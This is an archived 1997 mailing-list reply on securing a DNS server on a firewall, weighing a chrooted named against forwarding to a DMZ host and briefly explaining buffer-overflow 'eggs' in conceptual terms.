Firewall Wizards mailing list archives
Re: DNS on the Firewall - security problem
From: Adam Shostack <adam () homeport org>
Date: Fri, 10 Oct 1997 07:51:09 -0400 (EDT)
Marc Heuse wrote: | I found so far two possiblities to solve this problem ... | The first is to chroot named. pointer : www.homeport.org/~adam/dns.html | The second is to just forward the dns resolving to a host in the dmz plus | running also the primary external dns there. | | Do you see any problems with these suggestions? | And another question, are there any secure/minimal dns-servers out there? | pointers? Since I wrote the chrooting a named doc, I'll remind everyone that a root process chrooted is not all that great an imrpovement in the theoretical analysis. Its a nice improvement in practicality, since there is no egg* to overflow and break a chroot. Thus, if you don't put CHROOT/bin/sh in place, the standard attacks will fail, but a smart attacker can still get in. In practicality, there are few smart attackers. Adam *An egg is the core of code that a biuffer overflow includes to do the real work. Its the thing that hatches and gets you root. See some early l0pht advisory. And make that "no egg generally available." -- "It is seldom that liberty of any kind is lost all at once." -Hume
Current thread:
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 10)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Darren Reed (Oct 12)
- Re: DNS on the Firewall - security problem Perry E. Metzger (Oct 12)
- Re: DNS on the Firewall - security problem Aleph One (Oct 12)
- Re: DNS on the Firewall - security problem Gaddy Gumbao (Oct 13)
- Message not available
- Re: DNS on the Firewall - security problem Bernd Eckenfels (Oct 19)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)